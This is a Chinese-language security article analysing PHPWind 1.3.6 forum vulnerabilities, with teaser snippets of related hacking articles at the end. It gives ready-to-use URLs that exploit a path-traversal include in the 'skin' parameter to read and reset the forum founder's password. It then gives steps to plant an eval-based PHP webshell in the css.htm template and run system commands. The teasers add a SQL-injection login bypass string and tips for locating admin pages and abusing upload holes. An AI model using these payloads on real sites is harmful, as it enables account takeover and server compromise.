PHPWIND1.3.6论坛漏洞分析

所属分类: 网络安全 / 漏洞分析 阅读数: 164
收藏 0 赞 0 分享

  PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIND 虽然代码严谨,逻辑清楚,但还是有一些漏洞,而且还相当严重。

  一 skin 变量未过滤导致管理员密码更改

  废话少说,我们来分析漏洞。漏洞代码如下 (header.php) :

  !function_exists('readover') && exit('Forbidden');

  if (!$skin) $skin=$db_defaultstyle;

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }else{

  include_once(R_P."data/style/wind.php");

  }

  $yeyestyle=='no' ? $i_table="bgcolor=$tablecolor" : $i_table='class=i_table';

  if($groupid=='guest' && $db_regpopup=='1'){

  $head_pop='head_pop';

  } else{

  $head_gotmsg=$winddb['newpm']==1 ? ' 您有新消息 ':' 短消息 ';

  }

  require_once(PrintEot('css'));

  require_once(PrintEot('header'));

  ?>

  其中 $skin 变量是我们提交的,在运行到这里之前,只有一个地方处理过 $skin 变量:

  $_COOKIE['skinco'] && empty($skin) && $skin=$_COOKIE['skinco'];

  语句判断 COOKIE 中是否已经包含 skinco 的信息,如果有了,就取得 COOKIE 中的值,这是处理个人页面风格用的。但如果我们的 COOKIE 中没有这个值 , 那么我们提交的 skin 变量就会一点不变的传到上面的漏洞代码。有人问,如果系统关了 register_globals 会怎么样,关了也没关系。

  if(!ini_get('register_globals') || !get_magic_quotes_gpc()){

  @extract($_POST,EXTR_SKIP);

  @extract($_GET,EXTR_SKIP);

  @extract($_COOKIE,EXTR_SKIP);

  @extract($_FILES,EXTR_SKIP);

  }

  系统在 global.php 中又给释放了。所以我们不管是用 GET 方法或者 POST 方法都可以把构造好的 SKIN 变量传给程序。那传给程序有什么用呢?这是重点!

  我们看这段代码:

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }…

  含义是如果( R_P.”data/style/$skin.php” )文件存在就把它包含进来,我也不分析有几种用法了,我直接给出我最简单危害最大的利用方法。

  我们把 skin 的值设为 ”../../admin/manager” ,那就变成了 R_P.”data/style/../../admin/manager.php”, 很显然,这是论坛管理用户的一个程序,存在而且可执行。这个程序是专门用来修改 sql_config.php 的,这里面都是重要数据,包括论坛创始人的用户名和密码。我们只要构造好就可以改它的密码,直接登陆后台管理。在改之前我们可以先查看创始人的用户名。

  我给出查看的方法,大家可以比对论坛程序自己分析一下,我就不在赘述了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin

  上面是我机子上的截图,其中 tplpath 变量非常重要,必须是 admin ,它是一个 template 路径,参数不对就不会显示了。

  好我们看了知道了用户名,就可以改它的密码了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&username=admin&password=xiaohua&check_pwd=xiaohua&action=go

  上面的几个参数的含义大家一看就明白,那个 username 必须添上面看到的用户名,密码自己设,至于为什么要按上面的方法构造,其实很简单 manager.php 需要哪些变量我们就提交哪些变量,不需要的我们不管。上面的变量是它所需要的,所以我们就提交这些变量,注意上面的 action 必须有值。提交后系统什么都不显示,没关系,我们再用第一次的方法就会发现两次密码不一样,证明我们改成功了。如图 2 所示:

  密码改了,我们就可以从管理页面登陆了。

  http://localhost/phpwind/admin.php

  二 后台利用 上传 SHELL

  本来改了管理员密码已经能控制论坛了,但我我觉得不传 SHELL 总觉得事情只做了一半。如何上传 SHELL ,这就要用到后台的功能了。 PHPWIND 不知是想给管理员非常大的权限还是认为没有人有能力进入后台,后台的权利真是大的惊人。其实我们不靠上面的方法,用跨站手段得到管理员密码也不难,不知写论坛的人是怎么想的。

  好,我就随便拣一处危害比较大的地方给大家分析一下,分析一下风格模板设置那个地方。

  点一下左边的连接,右边会显示 /template/wind/css.htm 。

  系统提供的功能简化理解就是可以任意编辑这个 CSS 文件,为论坛的界面做个性化设置,而且论坛运行的时候会 include 这个 css 文件,虽然它的扩展名是 .htm ,但是照样会和其他 PHP 文件一样运行。如果我们能象这个 css.htm 文件写一些 PHP 代码,就相当于我们写一个 SHELL ,是不是很简单。篇幅有限,我直接给出利用方法。把那个右边的 textarea 里面的换成下面的,然后点提交就行了。

  eval($_GET[myphpcode]);

  ?>

  大家最好按上面的构造,当然也可以自己构造,不过上面的方法我做过实验,成功率很高。

  保存之后,用下面的方法就可以利用了。

  http://localhost/phpwind/faq.php?myphpcode=echo%20system(dir);exit ;

  可以运行其它PHP语句,在此不在赘述。

  (本文由责任编辑 pasu 整理发布)

更多精彩内容其他人还在看

织梦管理系统后台查找

  有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。   这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl   但不一定通杀。。  
收藏 0 赞 0 分享

ckeditor/DesignCms上传漏洞

  今天日站发现的....   http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞   上传后没改文件名!可以IIS解析   后面的事,你懂的~   有点像FCK ...   我晕了...这程式漏洞真多  
收藏 0 赞 0 分享

DedeCmsV5.6 本地包含又一利用方式

  续本地包含   include/arc.datalist.class.php   $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);   if(file_exists(DEDEINC.'/code/data
收藏 0 赞 0 分享

phpcms V9 BLind SQL 注入漏洞0day

  影响版本:phpcms v9 blind  phpcms v9 blind 参数过滤存在SQL注入漏洞。
收藏 0 赞 0 分享

AWBS 2.9.2 Blind SQL 注入0day

AWBS 2.9.2 Blind SQL 注入0day,大家可以参考下。
收藏 0 赞 0 分享

金山毒霸多个sql注入及XSS漏洞和修复

金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下。
收藏 0 赞 0 分享

Zblog最新跨站漏洞及利用代码

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
收藏 0 赞 0 分享

xyxcms v1.3 小游戏CMS 漏洞说明

国内最专业的ASP网站内容管理系统-小游戏管理系统,他将是您轻松建站的首选利器。挺好的一个系统,就是有点小问题,大家可以修改下。
收藏 0 赞 0 分享

Discuz X1.5 用不到 Gmail SSL SMTP

前天 16:50 上传 下载附件 (34.22 KB) ,窃听器哪里有卖 设置如上,车辆跟踪器,登入 username 及 password 都再三确认 但用「检测」就弹出以下错误 前天 16:50 上传 下载附件 (12.73 KB) 请问
收藏 0 赞 0 分享

万能密码漏洞以及修复

  万能密码漏洞以及修复   记得几年前要入侵一个企业网站超级简单   一般只需要找到后台 还有后台通常是www.xxx.com/admin/   然后账号 密码都是'or'='or' 就进去   现在好像有几个也可以用 但是已经没那么普及了   如果网站还出现这种“
收藏 0 赞 0 分享
查看更多